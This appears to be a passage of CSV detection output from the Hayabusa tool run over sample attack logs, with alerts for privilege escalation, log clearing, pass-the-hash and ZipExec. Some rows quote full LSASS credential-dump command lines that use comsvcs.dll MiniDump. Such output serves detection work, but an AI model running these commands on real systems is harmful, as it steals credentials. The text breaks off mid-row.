http://192.168.10.254:80/calc.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: c:\temp\EfsPotato.exe whoami : Path: C:\temp\EfsPotato.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\temp\EfsPotato.exe whoami,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:52.250 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding : Path: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-10-19 23:33:13.262 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx -2021-10-19 23:40:28.001 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx -2021-10-19 23:42:41.218 +09:00,FS03.offsec.lan,4728,medium,User added to global security group,Member added: - : SID: S-1-5-21-3410678313-1251427014-1131291384-1004 : Group: None : Subject user: admmig : Subject domain: OFFSEC,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx -2021-10-19 23:42:41.234 +09:00,FS03.offsec.lan,4720,medium,Local user account created,User: toto3 : SID:S-1-5-21-3410678313-1251427014-1131291384-1004,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx -2021-10-19 23:44:30.780 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx -2021-10-19 23:45:16.394 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx -2021-10-20 22:39:12.731 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,informational,Logon Type 9 - NewCredentials,User: admmig : Workstation: - : IP Address: ::1 : Port: 0 : LogonID: 0x266e045 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x266e045,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 22:39:21.730 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: OFFSEC\admmig : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,PowerShell Get-Process LSASS,,rules/sigma/process_creation/win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full : Path: C:\Windows\System32\rundll32.exe : User: OFFSEC\admmig : Parent Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,critical,Lsass Memory Dump via Comsvcs DLL,,rules/sigma/process_access/sysmon_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 49192 : LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 38940 : LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:13.725 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:22.291 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx -2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx -2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: cscript.exe //e:jscript testme.js : Path: C:\Windows\System32\cscript.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,medium,WSF/JSE/JS/VBA/VBE File Execution,,rules/sigma/process_creation/win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:"""" : Path: C:\Windows\System32\cmdkey.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe"" : Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip : Path: C:\Windows\System32\cmdkey.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:14.015 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png"" : Path: C:\Program 